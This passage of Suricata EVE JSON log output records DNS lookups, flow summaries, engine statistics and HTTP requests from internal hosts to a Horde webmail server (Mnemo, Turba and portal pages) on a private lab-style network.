muse":12281632},"detect":{"alert":24},"app_layer":{"
flow":{"http":1756,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2249,"failed_udp":110},"tx":{"http":4545,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2326}},"flow_mgr":{"closed_pruned":2694,"new_pruned":15,"est_pruned":2296,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20837,"memcap_state":0,"memcap_global":0},"http":{"memuse":53911,"memcap":0}}} {"timestamp":"2020-02-29T00:07:24.001722+0000","flow_id":936726630439456,"event_type":"flow","src_ip":"192.168.10.122","src_port":43411,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:23.858656+0000","end":"2020-02-29T00:02:23.964468+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:25.401776+0000","flow_id":1214181537235511,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52696,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5750},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":22300,"tx_id":0}} 
{"timestamp":"2020-02-29T00:07:28.000450+0000","event_type":"stats","stats":{"uptime":14100,"capture":{"kernel_packets":133819,"kernel_drops":0},"decoder":{"pkts":133822,"bytes":92548413,"invalid":183,"ipv4":132363,"ipv6":8,"ethernet":133822,"raw":0,"null":0,"sll":0,"tcp":127233,"udp":4932,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2714,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2730,"synack":2721,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1757,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2250,"failed_udp":110},"tx":{"http":4546,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2327}},"flow_mgr":{"closed_pruned":2694,"new_pruned":15,"est_pruned":2297,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20506,"memcap_state":0,"memcap_global":0},"http":{"memuse":2192,"memcap":0}}} 
{"timestamp":"2020-02-29T00:07:29.000493+0000","flow_id":1061177603184026,"event_type":"flow","src_ip":"192.168.10.122","src_port":56168,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":172,"bytes_toclient":282,"start":"2020-02-29T00:02:28.578970+0000","end":"2020-02-29T00:02:28.812490+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:30.133597+0000","flow_id":2246425387862493,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49223,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":27477,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:30.242241+0000","flow_id":2246425387862493,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49223,"proto":"UDP","dns":{"type":"answer","id":27477,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:30.242241+0000","flow_id":2246425387862493,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49223,"proto":"UDP","dns":{"type":"answer","id":27477,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:30.268255+0000","flow_id":1337983970224512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:07:30.268255+0000","flow_id":1337983970224512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":16,"tx_id":0}} {"timestamp":"2020-02-29T00:07:32.000140+0000","flow_id":893085479963979,"event_type":"flow","src_ip":"192.168.10.130","src_port":34744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":18,"pkts_toclient":28,"bytes_toserver":3250,"bytes_toclient":28563,"start":"2020-02-29T00:05:29.625995+0000","end":"2020-02-29T00:06:30.686607+0000","age":61,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:07:32.000396+0000","flow_id":263627957994143,"event_type":"flow","src_ip":"192.168.10.130","src_port":34746,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":6,"bytes_toserver":1276,"bytes_toclient":956,"start":"2020-02-29T00:05:30.656031+0000","end":"2020-02-29T00:06:30.686645+0000","age":60,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:07:34.388868+0000","flow_id":1337983970224512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52698,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:07:34.399804+0000","flow_id":23852826892732,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43605,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49607,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:34.508268+0000","flow_id":23852826892732,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43605,"proto":"UDP","dns":{"type":"answer","id":49607,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:07:34.508268+0000","flow_id":23852826892732,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43605,"proto":"UDP","dns":{"type":"answer","id":49607,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:34.638156+0000","flow_id":1337983970224512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:07:34.638156+0000","flow_id":1337983970224512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":199,"tx_id":1}} {"timestamp":"2020-02-29T00:07:34.656889+0000","flow_id":746339340518905,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54527,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":33582,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:07:34.764835+0000","flow_id":746339340518905,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54527,"proto":"UDP","dns":{"type":"answer","id":33582,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:34.764835+0000","flow_id":746339340518905,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54527,"proto":"UDP","dns":{"type":"answer","id":33582,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:34.862566+0000","flow_id":1337983970224512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5486}} 
{"timestamp":"2020-02-29T00:07:35.000218+0000","event_type":"stats","stats":{"uptime":14107,"capture":{"kernel_packets":133828,"kernel_drops":0},"decoder":{"pkts":133831,"bytes":92550250,"invalid":183,"ipv4":132372,"ipv6":8,"ethernet":133831,"raw":0,"null":0,"sll":0,"tcp":127240,"udp":4934,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2715,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2731,"synack":2722,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1758,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2251,"failed_udp":110},"tx":{"http":4547,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2328}},"flow_mgr":{"closed_pruned":2696,"new_pruned":15,"est_pruned":2298,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21166,"memcap_state":0,"memcap_global":0},"http":{"memuse":53880,"memcap":0}}} 
{"timestamp":"2020-02-29T00:07:35.005162+0000","flow_id":17002334350197,"event_type":"flow","src_ip":"192.168.10.122","src_port":35837,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:33.551797+0000","end":"2020-02-29T00:02:33.658408+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:39.863240+0000","flow_id":1337983970224512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52698,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5486},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":27327,"tx_id":2}} {"timestamp":"2020-02-29T00:07:40.000714+0000","flow_id":1521357579846265,"event_type":"flow","src_ip":"192.168.10.122","src_port":39579,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:39.033401+0000","end":"2020-02-29T00:02:39.144484+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:07:42.000516+0000","flow_id":926165322136906,"event_type":"flow","src_ip":"192.168.10.81","src_port":52692,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":10,"bytes_toserver":1219,"bytes_toclient":8809,"start":"2020-02-29T00:06:31.425290+0000","end":"2020-02-29T00:06:41.624893+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:07:42.000731+0000","flow_id":384282168206084,"event_type":"flow","src_ip":"192.168.10.122","src_port":42164,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:41.140036+0000","end":"2020-02-29T00:02:41.244983+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:07:43.000189+0000","event_type":"stats","stats":{"uptime":14115,"capture":{"kernel_packets":133852,"kernel_drops":0},"decoder":{"pkts":133853,"bytes":92559420,"invalid":183,"ipv4":132392,"ipv6":8,"ethernet":133853,"raw":0,"null":0,"sll":0,"tcp":127256,"udp":4938,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2715,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2731,"synack":2722,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1758,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2253,"failed_udp":110},"tx":{"http":4549,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2330}},"flow_mgr":{"closed_pruned":2696,"new_pruned":15,"est_pruned":2300,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20173,"memcap_state":0,"memcap_global":0},"http":{"memuse":2032,"memcap":0}}} 
{"timestamp":"2020-02-29T00:07:43.001397+0000","flow_id":542306914958372,"event_type":"flow","src_ip":"192.168.10.130","src_port":34748,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1095,"bytes_toclient":725,"start":"2020-02-29T00:06:30.687140+0000","end":"2020-02-29T00:06:42.570839+0000","age":12,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:07:43.818348+0000","flow_id":2246425387862493,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49223,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":31542,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:07:43.926789+0000","flow_id":2246425387862493,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49223,"proto":"UDP","dns":{"type":"answer","id":31542,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:43.926789+0000","flow_id":2246425387862493,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49223,"proto":"UDP","dns":{"type":"answer","id":31542,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:44.000900+0000","flow_id":1825376840178270,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"158.69.60.196","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:02:43.449118+0000","end":"2020-02-29T00:02:43.556107+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:07:44.089851+0000","flow_id":2004988097150431,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34760,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc&view=Contact","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6933}} {"timestamp":"2020-02-29T00:07:46.417076+0000","flow_id":360397875076404,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46500,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":63556,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:46.525040+0000","flow_id":360397875076404,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46500,"proto":"UDP","dns":{"type":"answer","id":63556,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:46.525040+0000","flow_id":360397875076404,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46500,"proto":"UDP","dns":{"type":"answer","id":63556,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:46.658213+0000","flow_id":642560046543245,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34762,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6136}} {"timestamp":"2020-02-29T00:07:47.000342+0000","flow_id":28091940766251,"event_type":"flow","src_ip":"192.168.10.122","src_port":43799,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:46.754219+0000","end":"2020-02-29T00:02:46.861282+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:47.001038+0000","flow_id":2218946168519686,"event_type":"flow","src_ip":"192.168.10.122","src_port":33488,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:46.228358+0000","end":"2020-02-29T00:02:46.339559+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:48.000525+0000","flow_id":1874300828193260,"event_type":"flow","src_ip":"192.168.10.81","src_port":52694,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":8,"bytes_toserver":1013,"bytes_toclient":6180,"start":"2020-02-29T00:06:41.856556+0000","end":"2020-02-29T00:06:47.067758+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:07:48.000794+0000","flow_id":206771170309255,"event_type":"flow","src_ip":"192.168.10.122","src_port":39566,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:47.390279+0000","end":"2020-02-29T00:02:47.501100+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:48.000908+0000","flow_id":406165026970995,"event_type":"flow","src_ip":"192.168.10.122","src_port":33988,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:47.204147+0000","end":"2020-02-29T00:02:47.309811+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:48.000998+0000","flow_id":979672010002716,"event_type":"flow","src_ip":"192.168.10.122","src_port":36753,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:47.528668+0000","end":"2020-02-29T00:02:47.634105+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:48.966645+0000","flow_id":2004988097150431,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34760,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc&view=Contact","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6933},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":35877,"tx_id":0}} {"timestamp":"2020-02-29T00:07:48.976304+0000","flow_id":1914802374239664,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51696,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":47241,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:49.000515+0000","flow_id":2186244303009272,"event_type":"flow","src_ip":"192.168.10.130","src_port":34750,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":10,"bytes_toserver":1225,"bytes_toclient":7931,"start":"2020-02-29T00:06:42.570872+0000","end":"2020-02-29T00:06:48.567753+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:07:49.084348+0000","flow_id":1914802374239664,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51696,"proto":"UDP","dns":{"type":"answer","id":47241,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 